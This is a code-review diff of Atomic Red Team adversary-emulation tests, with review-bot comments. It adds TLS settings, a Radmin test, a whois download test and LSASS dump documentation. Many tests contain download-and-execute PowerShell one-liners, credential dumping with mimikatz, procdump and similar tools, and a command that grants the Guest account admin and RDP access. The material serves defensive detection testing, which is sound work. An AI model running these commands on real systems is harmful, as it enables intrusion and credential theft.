+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose
name: powershell
- name: Find Local Admins via Group Policy (PowerView)
auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
@@ -49697,9 +50239,9 @@ discovery:
type: Path
default: "$env:COMPUTERNAME"
executor:
- command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
- -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name}
- -Verbose'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
name: powershell
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
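Review bot: The rewritten command line ends with a stray double quote, `... -ComputerName #{computer_name} -Verbose"`, and inside a `|` block scalar that quote is literal, so PowerShell receives an unterminated string and the Find-GPOComputerAdmin test fails to parse. Drop the trailing quote so the line ends with `-ComputerName #{computer_name} -Verbose`, matching the sibling PowerView hunks on this page.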
@@ -49759,10 +50301,9 @@ discovery:
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
'
- get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
- -OutFile #{adfind_path}
-
-'
+ get_prereq_command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: "#{adfind_path} -f (objectcategory=group)\n"
name: command_prompt
@@ -50841,11 +51382,22 @@ discovery:
'
supported_platforms:
- windows
- executor:
- command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
- -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Endpoint must be joined to domain
'
+ prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
+ {exit 0} else {exit 1}
+
+'
+ get_prereq_command: '"Join system to domain"
+
+'
+ executor:
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
name: powershell
T1040:
technique:
@@ -52337,7 +52889,7 @@ discovery:
vbscript:
description: Path to sample script
type: String
- default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+ default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
executor:
command: 'cscript #{vbscript}'
name: powershell
@@ -52908,10 +53460,9 @@ discovery:
supported_platforms:
- windows
executor:
- command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
- -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
-
-'
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
name: powershell
T1007:
technique:
@@ -58178,7 +58729,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -58239,7 +58791,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -58277,7 +58830,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
@@ -58314,7 +58868,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
@@ -58448,7 +59003,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
name: powershell
- name: Potentially Unwanted Applications (PUA)
@@ -59667,7 +60223,8 @@ execution:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
@@ -60076,7 +60633,41 @@ execution:
x_mitre_remote_support: true
x_mitre_contributors:
- Shane Tully, @securitygypsy
- atomic_tests: []
+ identifier: T1072
+ atomic_tests:
+ - name: Radmin Viewer Utility
+ auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+ description: 'An adversary may use Radmin Viewer Utility to remotely control
+ Windows device, this will start the radmin console.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ radmin_installer:
+ description: Radmin Viewer installer
+ type: Path
+ default: "%TEMP%\\RadminViewer.msi"
+ radmin_exe:
+ description: The radmin.exe executable from RadminViewer.msi
+ type: Path
+ default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+ dependencies:
+ - description: 'Radmin Viewer Utility must be installed at specified location
+ (#{radmin_exe})
+
+'
+ prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+ get_prereq_command: |
+ echo Downloading radmin installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+ msiexec /i "#{radmin_installer}" /qn
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: '"#{radmin_exe}"'
T1153:
technique:
id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0
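Review bot: The new T1072 test has no cleanup_command, so after a run the silently installed Radmin Viewer, the downloaded MSI in `%TEMP%`, and the launched console all persist on the host; a cleanup along the lines of `msiexec /x "#{radmin_installer}" /qn` followed by `del "#{radmin_installer}" >nul 2>&1` would return the machine to its prior state. The get_prereq_command also installs a third-party MSI with elevation without verifying it, whereas the T1003.001 docs on this page verify downloads with `Invoke-WebRequestVerifyHash`; recording the expected hash as an input argument and checking it before `msiexec /i` would prevent a changed download from being installed unnoticed. The identical block is added again under lateral-movement (`@@ -62428`).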
@@ -60546,7 +61137,8 @@ execution:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -60583,7 +61175,8 @@ execution:
'
executor:
- command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+ command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+ (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
-officeProduct \"Word\" -sub \"Extract\"\n"
cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -62428,7 +63021,41 @@ lateral-movement:
x_mitre_remote_support: true
x_mitre_contributors:
- Shane Tully, @securitygypsy
- atomic_tests: []
+ identifier: T1072
+ atomic_tests:
+ - name: Radmin Viewer Utility
+ auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+ description: 'An adversary may use Radmin Viewer Utility to remotely control
+ Windows device, this will start the radmin console.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ radmin_installer:
+ description: Radmin Viewer installer
+ type: Path
+ default: "%TEMP%\\RadminViewer.msi"
+ radmin_exe:
+ description: The radmin.exe executable from RadminViewer.msi
+ type: Path
+ default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+ dependencies:
+ - description: 'Radmin Viewer Utility must be installed at specified location
+ (#{radmin_exe})
+
+'
+ prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+ get_prereq_command: |
+ echo Downloading radmin installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+ msiexec /i "#{radmin_installer}" /qn
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: '"#{radmin_exe}"'
T1080:
technique:
id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
@@ -64253,6 +64880,55 @@ command-and-control:
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
name: command_prompt
+ - name: whois file download
+ auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+ description: 'Download a remote file using the whois utility
+
+'
+ supported_platforms:
+ - linux
+ - macos
+ input_arguments:
+ remote_host:
+ description: Remote hostname or IP address
+ type: String
+ default: localhost
+ remote_port:
+ description: Remote port to connect to
+ type: Integer
+ default: 8443
+ output_file:
+ description: Path of file to save output to
+ type: Path
+ default: "/tmp/T1105.whois.out"
+ query:
+ description: Query to send to remote server
+ type: String
+ default: Hello from Atomic Red Team test T1105
+ timeout:
+ description: Timeout period before ending process (seconds)
+ type: Integer
+ default: 1
+ dependencies:
+ - description: 'The whois and timeout commands must be present
+
+'
+ prereq_command: 'which whois && which timeout
+
+'
+ get_prereq_command: 'echo "Please install timeout and the whois package"
+
+'
+ executor:
+ name: sh
+ elevation_required: false
+ command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
+ #{remote_port} "#{query}" > #{output_file}
+
+'
+ cleanup_command: 'rm -f #{output_file}
+
+'
T1090.001:
technique:
external_references:
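Review bot: The new whois test's description does not say that a listener must be serving the file at `#{remote_host}:#{remote_port}`; with the defaults (`localhost`, `8443`) nothing is listening, so whois exits with a connection error and `#{output_file}` is left empty or holds only the error text, which will look like a failed test to anyone following the docs. Suggested wording: `description: Download a remote file using the whois utility. Requires a listener on #{remote_host}:#{remote_port} that returns the file body in response to the query; with the default localhost target the output file will be empty.` The `timeout` default of 1 second is also tight for anything other than a local listener and is worth mentioning in the argument description.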
@@ -66948,9 +67624,9 @@ initial-access:
atomic_tests:
- name: Enable Guest account with RDP capability and admin priviliges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active)
- and added to Administrators and Remote Desktop Users Group, and desktop will
- allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
@@ -66962,6 +67638,10 @@ initial-access:
description: Specify the guest password
type: String
default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
executor:
command: |-
net user #{guest_user} /active:yes
@@ -66974,8 +67654,9 @@ initial-access:
net user #{guest_user} /active:no >nul 2>&1
net localgroup administrators #{guest_user} /delete >nul 2>&1
net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
T1078.002:
@@ -67642,6 +68323,7 @@ initial-access:
description: |
The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
The below will successfully download the macro-enabled Excel file to the current location.
+ File is downloaded to the %temp% folder.
supported_platforms:
- windows
executor:
@@ -67650,13 +68332,13 @@ initial-access:
return 'Please install Microsoft Excel before running this test.'
}
else{
- $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+ $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
$fileName = 'PhishingAttachment.xlsm'
New-Item -Type File -Force -Path $fileName | out-null
$wc = New-Object System.Net.WebClient
$wc.Encoding = [System.Text.Encoding]::UTF8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- ($wc.DownloadString("$url")) | Out-File $fileName
+ Invoke-WebRequest -Uri $url -OutFile $fileName
}
name: powershell
- name: Word spawned a command shell and used an IP address in the command line
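Review bot: The previous hunk (`@@ -67642`) adds "File is downloaded to the %temp% folder." to the description, but the code here still writes to `$fileName = 'PhishingAttachment.xlsm'`, a path relative to whatever the current directory is, so the documentation and behavior disagree unless the runner's working directory happens to be %TEMP%; either `$fileName = "$env:TEMP\PhishingAttachment.xlsm"` or a corrected description would reconcile them. With `Invoke-WebRequest -OutFile` now doing the download, the `New-Item -Type File -Force -Path $fileName` line is redundant and the `$wc = New-Object System.Net.WebClient` / `$wc.Encoding` lines are dead code and should be removed. The enclosing PowerShell block begins outside this hunk.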
@@ -67695,7 +68377,8 @@ initial-access:
'
executor:
command: |
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 26822e04..024dd2aa 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -65,10 +65,14 @@ If you see a message saying \"wce.exe is not recognized as an internal or extern
**Supported Platforms:** Windows
+**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
@@ -94,11 +98,12 @@ del "#{output_file}" >nul 2>&1
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
+if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
@@ -124,10 +129,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
+**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
@@ -151,10 +160,11 @@ del "#{output_file}" >nul 2> nul
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -175,6 +185,10 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
+**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
+
+
+
@@ -208,10 +222,14 @@ If you see a message saying \"The system cannot find the path specified.\", try
**Supported Platforms:** Windows
+**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe|
@@ -234,10 +252,11 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
@@ -255,6 +274,10 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
+**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
+
+
+
#### Run it with these steps!
@@ -285,10 +308,14 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
**Supported Platforms:** Windows
+**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003.001\bin\mimikatz.exe|
@@ -308,10 +335,11 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
$request = [System.Net.WebRequest]::Create($url)
$response = $request.GetResponse()
@@ -328,7 +356,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
-cmd /c "if not exist #{input_file} (exit /b 1)"
+cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
@@ -351,6 +379,10 @@ Successful execution of this test will display multiple useranames and passwords
**Supported Platforms:** Windows
+**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
+
+
+
@@ -369,7 +401,7 @@ pypykatz live lsa
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -379,7 +411,7 @@ echo "Python 3 must be installed manually"
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -389,7 +421,7 @@ echo "PIP must be installed manually"
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
-exit /b %errorlevel%
+exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
@@ -410,6 +442,10 @@ Upon successful execution, you should see the following file created $env:SYSTEM
**Supported Platforms:** Windows
+**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
+
+
+
@@ -417,6 +453,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
@@ -443,10 +480,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
+**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
@@ -470,7 +511,7 @@ del "#{output_file}" >nul 2> nul
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -495,10 +536,14 @@ Or, if you try to run the test without the required administrative privleges you
**Supported Platforms:** Windows
+**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
@@ -525,10 +570,14 @@ This test uses the technique describe in this tweet
**Supported Platforms:** Windows
+**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp|
| createdump_exe | Path of createdump.exe executable | Path | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe|
@@ -556,7 +605,7 @@ del #{output_file}
##### Description: Computer must have createdump.exe from .Net 5
##### Check Prereq Commands:
```powershell
-if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
+if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -579,10 +628,14 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
+**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
@@ -606,10 +659,11 @@ Remove-Item ${output_file} -ErrorAction Ignore
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
-if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index eb902b08..95a7a2f6 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -38,6 +38,7 @@ atomic_tests:
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
